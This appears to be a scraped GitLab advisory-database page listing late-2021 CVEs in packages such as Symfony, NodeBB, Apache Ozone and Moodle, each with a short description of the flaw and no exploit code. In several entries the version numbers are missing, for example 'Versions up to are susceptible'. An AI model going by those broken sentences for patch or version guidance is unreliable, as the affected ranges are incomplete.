Recently Added Advisories

Advisories that have been merged within the last 14 days are listed below (sorted from newest to oldest).
Advisories published through NVD are available in the GitLab Advisory database within 1.6 days (on average).

CVE-2021-3994

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/django-helpdesk

django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-12-03

CVE-2021-3993

Cross-Site Request Forgery (CSRF) in packagist/showdoc/showdoc

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-12-03

CVE-2021-3989

URL Redirection to Untrusted Site ('Open Redirect') in packagist/showdoc/showdoc

showdoc is vulnerable to URL Redirection to Untrusted Site

Added on 2021-12-03

CVE-2021-4017

Cross-Site Request Forgery (CSRF) in packagist/showdoc/showdoc

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-12-03

CVE-2021-4018

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/snipe/snipe-it

snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-12-03

CVE-2021-3990

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in packagist/showdoc/showdoc

showdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

Added on 2021-12-03

CVE-2021-25967

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/ckan

CKAN is affected by a stored XSS vulnerability via SVG file upload of users’ profile picture. This allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture.

Added on 2021-12-03

CVE-2021-22095

Deserialization of Untrusted Data in maven/org.springframework.amqp/spring-amqp

The Spring AMQP Message object, in its `toString()` method, will create a new String object from the message body, regardless of its size. This can cause an OOM Error with a large message.

Added on 2021-12-02

CVE-2021-41270, GHSA-2xhg-w2g5-w95x

Improper Neutralization of Formula Elements in a CSV File in packagist/symfony/symfony

`Symfony/Serializer` handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony is vulnerable to CSV injection, also known as formula injection. In Symfony, maintainers added the opt-in `csv_escape_formulas` option in the `CsvEncoder`, to prefix all cells starting with `=`, `+`, `-` or `@` with a tab `\t`. Since then, OWASP added 2 chars in that list, Tab (0x09) and Carriage return (0x0D). This makes the previous prefix char (Tab `\t`) part of the vulnerable characters, and OWASP suggests using the single quote `'` for prefixing the value.

Added on 2021-12-02

CVE-2021-41268, GHSA-qw36-p97w-vcqr

Session Fixation in packagist/symfony/security-http

`Symfony/SecurityBundle` is the security system for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Since the rework of the Remember me cookie, the cookie is not invalidated when the user changes their password. Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a valid remember me cookie. Starting with, Symfony makes the password part of the signature by default. In that way, when the password changes, then the cookie is not valid anymore.

Added on 2021-12-01

CVE-2021-23732

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in npm/docker-cli-js

If the command parameter of the `Docker.command` method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system.

Added on 2021-12-01

CVE-2021-43785, GHSA-f34m-x9pj-62vq

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/@joeattardi/emoji-button

@joeattardi/emoji-button is a Vanilla JavaScript emoji picker component. There are two vectors for XSS attacks, a URL for a custom emoji, and an i18n string. In both of these cases, a value can be crafted such that it can insert a `script` tag into the page and execute malicious code.

Added on 2021-12-01

CVE-2021-43788, GHSA-pfj7-2qfw-vwgm

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in npm/nodebb

Nodebb is an open source Node.js based forum software. A path traversal vulnerability was present that allowed users to access JSON files outside of the expected `languages/` directory.

Added on 2021-12-01

CVE-2021-43787, GHSA-wx69-rvg3-x7fc

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/nodebb

A prototype pollution vulnerability in the uploader module allowed a malicious user to inject arbitrary data (i.e. javascript) into the DOM, theoretically allowing for an account takeover when used in conjunction with a path traversal vulnerability disclosed at the same time as this report.

Added on 2021-12-01

CVE-2021-43786, GHSA-hf2m-j98r-4fqw

Improper Authentication in npm/nodebb

Incorrect logic present in the token verification step unintentionally allowed master token access to the API.

Added on 2021-12-01

CVE-2021-32061

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in pypi/S3Scanner

S3Scanner allows Directory Traversal via a crafted bucket, as demonstrated by a `<Key>../` substring in a ListBucketResult element.

Added on 2021-12-01

CVE-2021-41267, GHSA-q3j3-w37x-hq2q

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in packagist/symfony/symfony

`Symfony/Http-Kernel` is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the `trusted_headers` allowed list are ignored and protect users from Cache poisoning attacks. In Symfony, maintainers added support for the `X-Forwarded-Prefix` headers, but this header was accessible in SubRequest, even if it was not part of the `trusted_headers` allowed list. An attacker could leverage this opportunity to forge requests containing a `X-Forwarded-Prefix` header, leading to a web cache poisoning issue.

Added on 2021-12-01

CVE-2021-41268, GHSA-qw36-p97w-vcqr

Session Fixation in packagist/symfony/symfony

`Symfony/SecurityBundle` is the security system for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Since the rework of the Remember me cookie, the cookie is not invalidated when the user changes their password. Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a valid remember me cookie. Symfony makes the password part of the signature by default. In that way, when the password changes, then the cookie is not valid anymore.

Added on 2021-12-01

CVE-2021-41267, GHSA-q3j3-w37x-hq2q

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in packagist/symfony/security-http

`Symfony/Http-Kernel` is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the `trusted_headers` allowed list are ignored and protect users from Cache poisoning attacks. In Symfony, maintainers added support for the `X-Forwarded-Prefix` headers, but this header was accessible in SubRequest, even if it was not part of the `trusted_headers` allowed list. An attacker could leverage this opportunity to forge requests containing a `X-Forwarded-Prefix` header, leading to a web cache poisoning issue.

Added on 2021-12-01

CVE-2021-25987

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/hexo

Hexo is vulnerable to stored XSS. The post `body` and `tags` don’t sanitize malicious javascript during web page generation. Local unprivileged attacker can inject arbitrary code.

Added on 2021-12-01

CVE-2021-41267, GHSA-q3j3-w37x-hq2q

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in packagist/symfony/http-kernel

`Symfony/Http-Kernel` is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the `trusted_headers` allowed list are ignored and protect users from Cache poisoning attacks. In Symfony, maintainers added support for the `X-Forwarded-Prefix` headers, but this header was accessible in SubRequest, even if it was not part of the `trusted_headers` allowed list. An attacker could leverage this opportunity to forge requests containing a `X-Forwarded-Prefix` header, leading to a web cache poisoning issue. have a patch to ensure that the `X-Forwarded-Prefix` header is not forwarded to subrequests when it is not trusted.

Added on 2021-12-01

CVE-2021-41268, GHSA-qw36-p97w-vcqr

Session Fixation in packagist/symfony/security

`Symfony/SecurityBundle` is the security system for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Since the rework of the Remember me cookie, the cookie is not invalidated when the user changes their password. Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a valid remember me cookie. Starting with, Symfony makes the password part of the signature by default. In that way, when the password changes, then the cookie is not valid anymore.

Added on 2021-12-01

CVE-2021-23654

Improper Neutralization of Formula Elements in a CSV File in pypi/html-to-csv

When there is a formula embedded in a HTML page, it gets accepted without any validation and the same would be pushed while converting it into a CSV file. Through this a malicious actor can embed or generate a malicious link or execute commands via CSV files.

Added on 2021-12-01

CVE-2021-41279, GHSA-4x2f-54wr-4hjg

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in packagist/baserproject/basercms

BaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.

Added on 2021-12-01

CVE-2021-41243, GHSA-7rpc-9m88-cf9w

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in packagist/baserproject/basercms

There is a Potential Zip Slip Vulnerability and OS Command Injection Vulnerability on the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.

Added on 2021-12-01

CVE-2021-43558

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/moodle/moodle

A URL parameter in the filetype site administrator tool requires extra sanitizing to prevent a reflected XSS risk.

Added on 2021-11-30

CVE-2021-44140

Incorrect Default Permissions in maven/org.apache.jspwiki/jspwiki-main

Remote attackers may delete arbitrary files in a system hosting a JSPWiki instance by using a carefuly crafted http request on logout, given that those files are reachable to the user running the JSPWiki instance.

Added on 2021-11-30

CVE-2021-40369

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in maven/org.apache.jspwiki/jspwiki-main

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute javascript in the victim's browser and retrieve sensitive information about the victim.

Added on 2021-11-30

CVE-2021-44140

Incorrect Default Permissions in maven/org.apache.jspwiki/jspwiki-war

Remote attackers may delete arbitrary files in a system hosting a JSPWiki instance by using a carefuly crafted http request on logout, given that those files are reachable to the user running the JSPWiki instance.

Added on 2021-11-30

CVE-2021-40369

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in maven/org.apache.jspwiki/jspwiki-war

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute javascript in the victim's browser and retrieve sensitive information about the victim.

Added on 2021-11-30

CVE-2021-41281, GHSA-3hfw-x7gx-437c

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in pypi/matrix-synapse

Synapse is a package for Matrix homeservers written in Python 3/Twisted. Synapse instances with the media repository enabled can be tricked into downloading a file from a remote server into an arbitrary directory. No authentication is required for the affected endpoint. The last 2 directories and file name of the path are chosen randomly by Synapse and cannot be controlled by an attacker, which limits the impact. Homeservers with the media repository disabled are unaffected. Homeservers with a federation allowlist are also unaffected, since Synapse will check the remote hostname, including the trailing `../`s, against the allowlist. Server administrators using a reverse proxy could, at the expense of losing media functionality, may block the certain endpoints as a workaround. Alternatively, non-containerized deployments can be adapted to use the hardened systemd config.

Added on 2021-11-30

CVE-2021-43559

Cross-Site Request Forgery (CSRF) in packagist/moodle/moodle

The `delete related badge` functionality does not include the necessary token check to prevent a CSRF risk.

Added on 2021-11-30

CVE-2021-20841

Incorrect Authorization in packagist/ec-cube/ec-cube

Improper access control in Management screen of EC-CUBE 2 series allows a remote authenticated attacker to bypass access restriction and to alter System settings via unspecified vectors.

Added on 2021-11-30

CVE-2021-43775, GHSA-8phj-f9w2-cjcc

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in pypi/aim

Aim is an open-source, self-hosted machine learning experiment tracking tool. Aim is vulnerable to a path traversal attack. By manipulating variables that reference files with `(../)` sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

Added on 2021-11-30

CVE-2021-43560

Exposure of Resource to Wrong Sphere in packagist/moodle/moodle

Insufficient capability checks made it possible to fetch other users' calendar action events.

Added on 2021-11-30

CVE-2021-23718

Server-Side Request Forgery (SSRF) in npm/ssrf-agent

The package ssrf-agent is vulnerable to Server-side Request Forgery (SSRF) via the `defaultIpChecker` function. It fails to properly validate if the IP requested is private.

Added on 2021-11-30

CVE-2021-25986

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/django-wiki

Django-wiki is vulnerable to Stored Cross-Site Scripting (XSS) in the Notifications Section. An attacker who has access to edit pages can inject JavaScript payload in the title field. When a victim gets a notification regarding the changes made in the application, the payload in the notification panel renders and loads external JavaScript.

Added on 2021-11-30

CVE-2021-3672

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in conan/c-ares

A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.

Added on 2021-11-30

CVE-2021-20842

Cross-Site Request Forgery (CSRF) in packagist/ec-cube/ec-cube

A Cross-site request forgery (CSRF) vulnerability in EC-CUBE 2 series to allows a remote attacker to hijack the authentication of Administrators and delete Administrators via a specially crafted web page.

Added on 2021-11-30

CVE-2021-44150

Use of a Broken or Risky Cryptographic Algorithm in nuget/tusdotnet

The client in tusdotnet relies on SHA-1 to prevent spoofing of file content.

Added on 2021-11-30

CVE-2021-43698

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/phpwhois/phpwhois

PhpWhois is affected by a Cross Site Scripting (XSS) vulnerability. In file `example.php`, the exit function will terminate the script and print the message to the user. The message contains the result of the `$_GET['query']` leading to an XSS vulnerability.

Added on 2021-11-30

CVE-2021-23673

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/plupload

This affects all versions of package pekeupload. If an attacker induces a user to upload a file whose name contains javascript code, the javascript code will be executed.

Added on 2021-11-25

CVE-2021-43668

NULL Pointer Dereference in go/github.com/ethereum/go-ethereum

Go-Ethereum nodes crash (denial of service) after receiving a serial of messages and cannot be recovered.

Added on 2021-11-25

CVE-2021-2471

Uncontrolled Resource Consumption in pypi/mysql-connector-python

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DoS) of MySQL Connectors.

Added on 2021-11-24

CVE-2021-43668

NULL Pointer Dereference in go/github.com/ethereum/go-ethereum/cmd/evm

Go-Ethereum nodes crash (denial of service) after receiving a serial of messages and cannot be recovered. They will crash with "runtime error: invalid memory address or nil pointer dereference" and arise a SEGV signal.

Added on 2021-11-24

CVE-2021-43669

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in go/github.com/hyperledger/fabric

A vulnerability has been detected in HyperLedger Fabric. It can easily break down as many orderers as the attacker wants. This bug can be leveraged by constructing a message whose header is invalid to the interface Order. This bug has been admitted and fixed by the developers of Fabric.

Added on 2021-11-24

CVE-2021-43667

NULL Pointer Dereference in go/github.com/hyperledger/fabric

A vulnerability has been detected in HyperLedger Fabric. If leveraged, any leader node will crash.

Added on 2021-11-24

CVE-2021-41278, GHSA-6c7m-qwxj-mvhp

Use of a Broken or Risky Cryptographic Algorithm in go/github.com/edgexfoundry/app-functions-sdk-go

Functions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user may expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new "aes256" transform.

Added on 2021-11-24

CVE-2021-41278, GHSA-6c7m-qwxj-mvhp

Use of a Broken or Risky Cryptographic Algorithm in go/github.com/edgexfoundry/app-functions-sdk-go/v2

Functions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user may expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new "aes256" transform.

Added on 2021-11-24

CVE-2021-41278, GHSA-6c7m-qwxj-mvhp

Use of a Broken or Risky Cryptographic Algorithm in go/github.com/edgexfoundry/app-service-configurable

Functions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user may expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new "aes256" transform.

Added on 2021-11-24

CVE-2021-41274, GHSA-xm34-v85h-9pg2

Cross-Site Request Forgery (CSRF) in gem/solidus_auth_devise

solidus_auth_devise provides authentication services for the Solidus webstore framework, using the Devise gem.Configured to use `:null_session` or `:reset_session` strategies (`:null_session` is the default in case the no strategy is given, but `rails --new` generated skeleton use `:exception`).

Added on 2021-11-24

CVE-2021-3950

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/django-helpdesk

django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-11-24

CVE-2021-43668

NULL Pointer Dereference in go/github.com/ethereum/go-ethereum/eth

Go-Ethereum nodes crash (denial of service) after receiving a serial of messages and cannot be recovered. They will crash with "runtime error: invalid memory address or nil pointer dereference" and arise a SEGV signal.

Added on 2021-11-24

CVE-2021-41273, GHSA-wwgq-9jhf-qgw6

Cross-Site Request Forgery (CSRF) in packagist/pterodactyl/panel

Pterodactyl is an open-source game server management panel built with PHP 7, React, and Go. Due to improperly configured CSRF protections on two routes, a malicious user could execute a CSRF-based attack against the following endpoints: Sending a test email and Generating a node auto-deployment token. At no point would any data be exposed to the malicious user, this would simply trigger email spam to an administrative user, or generate a single auto-deployment token unexpectedly. This token is not revealed to the malicious user, it is simply created unexpectedly in the system. This has been addressed in release `1.6.6`. Users may optionally manually apply the fixes released in v1.6.6 to patch their own systems.

Added on 2021-11-24

CVE-2021-3976

Cross-Site Request Forgery (CSRF) in packagist/kevinpapst/kimai2

kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-11-24

CVE-2021-3957

Cross-Site Request Forgery (CSRF) in packagist/kevinpapst/kimai2

kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-11-24

CVE-2021-3963

Cross-Site Request Forgery (CSRF) in packagist/kevinpapst/kimai2

kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-11-24

CVE-2021-3961

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/snipe/snipe-it

snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-11-24

CVE-2021-41275, GHSA-26xx-m4q2-xhq8

Cross-Site Request Forgery (CSRF) in gem/spree_auth_devise

spree_auth_devise is an open source library which provides authentication and authorization services for use with the Spree storefront framework by using an underlying Devise authentication framework.* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception).

Added on 2021-11-24

CVE-2021-44144

Out-of-bounds Read in pypi/asterix_decoder

Croatia Control Asterix has a heap-based buffer over-read, with additional details to be disclosed at a later date.

Added on 2021-11-24

CVE-2021-39198, GHSA-vf7h-6246-hm43

Cross-Site Request Forgery (CSRF) in packagist/oro/crm

OroCRM is an open source Client Relationship Management (CRM) application. There are no workarounds that address this vulnerability and all users are advised to update their package.

Added on 2021-11-24

CVE-2021-41165, GHSA-7h26-63m7-qhf2

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/ckeditor4

CKEditor4 is an open source WYSIWYG HTML editor. The vulnerability allowed to inject malformed comments HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at The problem has been recognized and patched.

Added on 2021-11-24

CVE-2021-3943

Improper Input Validation in packagist/moodle/moodle

A flaw was found in Moodle to to to unsupported versions. A remote code execution risk when restoring backup files was identified.

Added on 2021-11-24

CVE-2021-23433

Improperly Controlled Modification of Dynamically-Determined Object Attributes in npm/algoliasearch-helper

The package algoliasearch-helper are vulnerable to Prototype Pollution due to use of the merge function.

Added on 2021-11-24

CVE-2021-2471

Uncontrolled Resource Consumption in maven/mysql-connector-java

Vulnerability in the MySQL Connectors product of Oracle MySQL. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DoS) of MySQL Connectors.

Added on 2021-11-24

CVE-2021-39231

Exposure of Resource to Wrong Sphere in maven/org.apache.ozone/ozone-datanode

In Apache Ozone, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.

Added on 2021-11-23

CVE-2021-39236

Improper Authentication in maven/org.apache.ozone/ozone

In Apache Ozone, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.

Added on 2021-11-22

CVE-2021-36372

Improper Check for Dropped Privileges in maven/org.apache.ozone/ozone

In Apache Ozone, Initially generated block tokens are persisted to the metadata database and can be retrieved with authenticated users with permission to the key. Authenticated users may use them even after access is revoked.

Added on 2021-11-22

CVE-2021-39234

Incorrect Authorization in maven/org.apache.ozone/ozone

In Apache Ozone, Authenticated users knowing the ID of an existing block can craft specific request allowing access those blocks, bypassing other security checks like ACL.

Added on 2021-11-22

CVE-2021-39235

Incorrect Permission Assignment for Critical Resource in maven/org.apache.ozone/ozone-datanode

In Apache Ozone, Ozone Datanode does not check the access mode parameter of the block token. Authenticated users with valid READ block token can do any write operation on the same block.

Added on 2021-11-22

CVE-2021-39233

Incorrect Authorization in maven/org.apache.ozone/ozone-datanode

In Apache Ozone, Container related Datanode requests of Ozone Datanode were not properly authorized and can be called by any client.

Added on 2021-11-22

CVE-2021-41532

Exposure of Resource to Wrong Sphere in maven/org.apache.ozone/ozone

In Apache Ozone, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.

Added on 2021-11-22

CVE-2021-39231

Exposure of Resource to Wrong Sphere in maven/org.apache.ozone/ozone

In Apache Ozone, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.

Added on 2021-11-22

CVE-2021-39232

Incorrect Authorization in maven/org.apache.ozone/ozone

In Apache Ozone, certain admin related SCM commands can be executed by any authenticated users, not just by admins.

Added on 2021-11-22

CVE-2021-41164, GHSA-pvmx-g8h5-cprj

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/ckeditor4

CKEditor4 is an open source WYSIWYG HTML editor. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code.

Added on 2021-11-22

CVE-2021-41269, GHSA-p9m8-27x8-rg87

Improper Control of Generation of Code ('Code Injection') in maven/com.cronutils/cron-utils

cron-utils is a Java library to define, parse, validate, migrate crons as well as get human readable descriptions for them. leading to unauthenticated Remote Code Execution (RCE) vulnerability. Versions up to are susceptible to this vulnerability.

Added on 2021-11-22

CVE-2021-43996

Improper Access Control in packagist/facade/ignition

The Ignition component for Laravel has a `fix variable names` feature that can lead to incorrect access control.

Added on 2021-11-22

CVE-2021-41266, GHSA-4999-659w-mq36

Missing Authentication for Critical Function in go/github.com/minio/console

Minio console is a graphical user interface for the for MinIO operator.Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.

Added on 2021-11-22

CVE-2021-41263, GHSA-844m-cpr9-jcmh

Exposure of Sensitive Information to an Unauthorized Actor in gem/rails_multisite

rails_multisite provides multi-db support for Rails applications.Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application. The issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.

Added on 2021-11-22